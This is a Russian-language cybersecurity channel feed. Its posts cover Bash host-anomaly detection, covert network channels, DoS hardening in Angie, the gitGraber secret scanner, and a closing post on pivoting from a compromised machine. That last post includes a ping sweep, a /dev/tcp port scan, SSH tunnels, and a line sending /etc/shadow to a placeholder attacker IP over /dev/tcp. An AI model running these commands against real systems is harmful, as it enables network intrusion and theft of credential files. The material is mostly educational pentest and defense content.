ZeroDay | Кибербезопасность

2 полезных ресурса по информационной безопасности и этичному хакингу: Похек — актуальные виды атак, правдивые новости из мира кибербеза, а также полезные статьи для специалистов разного профиля от стажёров до сеньоров. infosec — ламповое сообщество, которое публикует редкую литературу, курсы и полезный контент для ИБ специалистов любого уровня и направления.

5 фишек Bash для обнаружения аномалий на хосте 👋 `Приветствую в мире цифровой безопасности! Давай расскажу о 5 фишках Bash, которые заметно ускорят пентест.` ⏺ Детектим инъекцию в легитимный процесс: for pid in /proc/[0-9]*; do maps="$pid/maps"; [[ -f $maps ]] && grep -l "rwxp" $maps 2>/dev/null; done Исполняемые анонимные регионы памяти (rwxp без файла) - частый признак shellcode injection или memfd_create. ⏺ Ищем процессы без файла на диске: for pid in /proc/[0-9]*; do exe=$(readlink $pid/exe 2>/dev/null); [[ $exe == *"(deleted)"* ]] && cat $pid/cmdline | tr '\0' ' ' && echo; done Малварь часто удаляет себя с диска после запуска. Процесс живёт, файла нет. ⏺ Мониторим появление новых сетевых неймспейсов: watch -n 5 'ls -la /proc/[0-9]*/ns/net | sort -k9 | uniq -f8' Новый сетевой неймспейс без контейнерной активности, повод смотреть внимательнее. Так прячут сетевую активность от хостового мониторинга. ⏺ Детектим запись в /proc через скрытый дескриптор: lsof +D /proc 2>/dev/null | grep -v "^COMMAND" | awk '{print $1,$2,$9}' | grep -v "self\|thread" Процессы, взаимодействующие с /proc чужих PID напрямую - нетипичное поведение для легитимного софта. ⏺ Сравниваем /proc/net/tcp с выводом ss: comm -23 <(awk 'NR>1 {print $2}' /proc/net/tcp | while read h; do printf "%d.%d.%d.%d:%d\n" 0x${h:6:2} 0x${h:4:2} 0x${h:2:2} 0x${h:0:2} $((16#${h:9:4})); done | sort) <(ss -tn | awk 'NR>1 {print $4}' | sort) Соединения в /proc/net/tcp, которых нет в выводе ss - признак руткита, скрывающего трафик. Zeroday - https://max.ru/cybersec_academy

Скрытые каналы - невидимый враг вашей сети 👋 Приветствую в мире цифровой безопасности! Если обычные утечки ищутся в содержимом пакетов, здесь всё уходит в сторону, данные прячутся не в payload, а в самом поведении сети. ⏺Передача без данных: В скрытом канале никто не «кладёт» секрет в пакет напрямую. Он кодируется в том, как идёт трафик - размеры пакетов, порядок, частота. Для системы это обычный HTTP или DNS, для принимающей стороны - уже битовый поток. ⏺Поля протоколов: Служебные значения часто никто не анализирует глубоко. IP ID, TTL, TCP options можно использовать как примитивное хранилище. Пакеты остаются валидными, поэтому спокойно проходят фильтры. ⏺Работа через время: Тайминги - один из самых практичных вариантов. Небольшие задержки между запросами превращаются в код. Снаружи это выглядит как нестабильная сеть или обычные «паузы» клиента. ⏺Кодирование через статистику: Более тихий вариант ф не отдельные пакеты, а распределение. Например, изменение частоты DNS-запросов или размеров ответов. В моменте всё ок, но на дистанции видно, что паттерн управляемый. ⏺Почему это не ловится «в лоб»: DPI и классические фильтры проверяют структуру и сигнатуры. Здесь нет ни того, ни другого, протокол не нарушен, данные легитимные. Отклонение только в метриках, которые обычно не триггерят алерты. ⏺ А где применяется: Такие каналы используют для передачи ключей, команд, телеметрии с имплантов. Плюс можно работать поверх уже разрешённых сервисов и не поднимать отдельный подозрительный трафик. ⏺Современные реализации: Сейчас каналы маскируются под поведение пользователя. Добавляются случайные задержки, смешивание с обычной активностью, имитация браузера. Поток выглядит «живым», а не машинным. ⏺Где это реально палится: Сигнатур тут нет, поэтому смотрят на аномалии. Повторяющиеся тайминги, странно ровные распределения, долгие сессии с маленьким, но стабильным трафиком. Без нормальной базы «как должно быть» такие вещи легко пропустить. Zeroday - https://max.ru/cybersec_academy

Защита от DoS в Angie: что делать, когда лимитов уже мало 👋 Приветствую в мире цифровой безопасности! Если базовые limit_req и limit_conn уже настроены, дальше начинается более «жёсткая» фильтрация. Разберём, как усиливают защиту в реальных конфигах ⏺Fail2Ban как автоматический бан по логам: Angie сам по себе не блокирует IP надолго, он просто режет запросы. Fail2Ban закрывает этот пробел: читает error.log и банит тех, кто регулярно упирается в лимиты. Логика простая: несколько превышений за короткое время → IP улетает в iptables. Пример jail: [nginx-limit-req] enabled = true logpath = /var/log/angie/*error.log findtime = 600 bantime = 7200 maxretry = 4 4 нарушения за 10 минут, и клиент блокируется на 2 часа. Проверка: fail2ban-client status nginx-limit-req Фактически это уже не rate limit, а реактивная защита с памятью. ⏺Геоблокировка как быстрый фильтр шума: Если сервис локальный, нет смысла принимать трафик со всего мира. Большая часть ботнетов распределена по разным странам, и простое ограничение резко снижает нагрузку. Подключается GeoIP2 и вводится переменная страны: map $geoip2_data_country_code $allowed_country { default no; RU yes; BY yes; } Дальше уже обычная логика: if ($allowed_country = no) { return 403; } Грубый, но очень эффективный фильтр. Минус - VPN и ошибки геолокации. ⏺Testcookie: проверка «ты вообще браузер?»: Когда атака выглядит как нормальный HTTP-трафик, остаётся проверять поведение клиента. Testcookie заставляет пройти простую проверку: принять cookie и выполнить JS. Боты, curl и часть сканеров на этом отваливаются. ⏺ Сценарий такой: первый запрос ➡️ сервер отдаёт страницу с JS JS выставляет cookie второй запрос ➡️ доступ только при валидной cookie Ключевые настройки: testcookie_name BPC; testcookie_session $remote_addr; testcookie_max_attempts 3; Если клиент не проходит проверку за несколько попыток - доступ не даётся. ⏺Почему этого всё равно может быть мало: Все эти методы хорошо режут «грубые» атаки: флудачи, сканеры, примитивные боты. Но при распределённой DDoS-атаке каждый бот ведёт себя аккуратно и не превышает лимиты. В этот момент защита на уровне сервера упирается в пределы - дальше нужны внешние фильтры и балансировка на стороне провайдера или CDN. Zeroday - https://max.ru/cybersec_academy

gitGraber: мониторинг утечек секретов на GitHub в реальном времени 👋 Приветствую в мире цифровой безопасности! Поговорим о еще одном инструменте безопасности. ⏺gitGraber - Python-утилита, которая мониторит новые файлы и коммиты, индексируемые GitHub. В отличие от классических сканеров, она не перебирает историю репозиториев. Скрипт следит именно за свежими изменениями и проверяет их на наличие секретов. ⏺Логика работы супер понятная: Инструмент отправляет поисковые запросы к GitHub API, получает список новых файлов и прогоняет их через набор regex-шаблонов. Если шаблон совпадает с содержимым файла, gitGraber считает, что найден возможный ключ или токен. Так ловятся, например: ➡️AWS ключи ➡️Google API tokens ➡️Stripe и PayPal ключи ➡️Slack webhook URL ➡️приватные SSH и RSA ключи ➡️токены GitHub и Twitter ⏺Главная идея: утечки часто происходят не у самой компании. Секреты регулярно появляются в публичных репозиториях подрядчиков, разработчиков или случайных тестовых проектов. Иногда ключ оказывается в открытом доступе буквально на несколько минут, но этого уже достаточно. ⏺Если gitGraber находит совпадение, он отправляет уведомление. Поддерживаются сразу несколько каналов: ➡️Slack ➡️Discord ➡️Telegram ➡️вывод прямо в CLI Это удобно для постоянного мониторинга инфраструктуры или бренда. ⏺ Перед запуском нужно добавить токены GitHub API в конфигурацию: GITHUB_TOKENS = ['token1','token2'] Также можно настроить уведомления: SLACK_WEBHOOKURL = 'https://hooks.slack.com/...' ⏺ Простейший запуск поиска по ключевому слову: python3 gitGraber.py -q "companyname" Скрипт начнёт мониторить новые файлы на GitHub и проверять их на наличие секретов. ⏺Инструмент умеет работать и в режиме постоянного наблюдения. Флаг -m создаёт cron-задачу и запускает проверку каждые 30 минут: python3 gitGraber.py -q "companyname" -s -m Если где-то появится API-ключ, уведомление прилетит сразу. Zeroday - https://max.ru/cybersec_academy

🎁 Розыгрыш книг ⚡️Разыгрываем книги по информационной безопасности и этичному хакингу (в бумажном варианте): — Сети глазами хакера — Искусственный интелект глазами хакера • Всего будет 4 призовых мест, а победители смогут выбрать любую понравившуюся книгу из списка выше. Итоги подведем ровно через неделю (24.03 в 19:00) при помощи бота который рандомно выберет победителя. Для участия нужно: 1. Подписаться на наш канал в максе https://max.ru/cybersec_academy 3. Нажать на кнопку «Участвовать». 🏆 Победителей: 4 📅 Окончание: 24.03.2026, 18:00 (МСК) 👇 Нажмите кнопку ниже, чтобы участвовать!

Анатомия DPI анализа: что происходит с твоим пакетом за первые 16 КБ Разбор того, как системы глубокой инспекции пакетов принимают решение: от первого SYN до поведенческого анализа зашифрованного потока. Без упрощений - с конкретными этапами и тем, какие сигналы система реально собирает. ⏺В статье, как по TTL и TCP-опциям определяется fingerprint клиента, как первые байты данных позволяют мгновенно распознать протокол, что именно смотрят в TLS ClientHello (JA3/JA4, SNI, ALPN), как сверяются сертификаты и ASN серверов. А после рукопожатия включается анализ метаданных: размеры пакетов, интервалы между ними, соотношение входящего и исходящего трафика и длительность соединения. Zeroday - https://max.ru/cybersec_academy

👩‍💻 Всем программистам посвящается! Вот 14 авторских обучающих IT каналов по самым востребованным областям программирования: Выбирай своё направление: 👩‍💻 Python — t.me/python_ready 🤔 InfoSec & Хакинг — t.me/hacking_ready 🖥 SQL & Базы Данных — t.me/sql_ready 🤖 Нейросети & ML — t.me/neuro_ready 👩‍💻 Frontend — t.me/frontend_ready 👩‍💻 IT Новости — t.me/it_ready 👩‍💻 C/C++ — https://t.me/cpp_ready 👩‍💻 C# & Unity — t.me/csharp_ready 👩‍💻 Linux — t.me/linux_ready 👩‍💻 Java — t.me/java_ready 📖 IT Книги — t.me/books_ready 📱 JavaScript — t.me/javascript_ready Zeroday - https://max.ru/cybersec_academy

Zeroday - https://max.ru/cybersec_academy

Bash для пивотинга в сети 👋 Приветствую в мире цифровой безопасности! Попали на машину внутри сети. Дальше нужно двигаться, но инструментов нет. Разберём, что можно сделать чистым Bash. ⏺ Находим соседей без nmap: for ip in 10.10.10.{1..254}; do ping -c1 -W1 $ip &>/dev/null && echo "$ip" & done; wait Фоновые процессы ускоряют скан. На /24 уходит секунд 10-15. ⏺ Проверяем порты через /dev/tcp: for h in $(cat live.txt); do for p in 22 80 443 445 3389 8080; do (echo >/dev/tcp/$h/$p) &>/dev/null && echo "$h:$p"; done; done Никаких бинарей. Работает везде, где есть Bash. ⏺Туннель через SSH без ProxyChains: ssh -D 1080 -N -f user@pivot_host SOCKS5 на localhost:1080. Если есть SSH на промежуточной машине - этого достаточно для дальнейшего движения. ⏺ Проброс порта через SSH: ssh -L 5432:db_host:5432 -N user@pivot_host База данных во внутренней сети становится доступна на локальном 5432. Полезно, когда нужен прямой доступ к сервису. ⏺Передача файлов без curl и wget: cat /etc/shadow > /dev/tcp/АТАКУЮЩИЙ_IP/4444 На принимающей стороне: nc -lvnp 4444 > shadow. Чистый Bash, никаких зависимостей. ⏺Ищем маршруты во внутренние подсети: ip route; cat /etc/hosts; arp -n | awk '{print $1}' Часто на пивот-хосте уже есть маршруты в нужные сегменты. Смотрим перед тем, как делать что-то сложнее. Zeroday - https://max.ru/cybersec_academy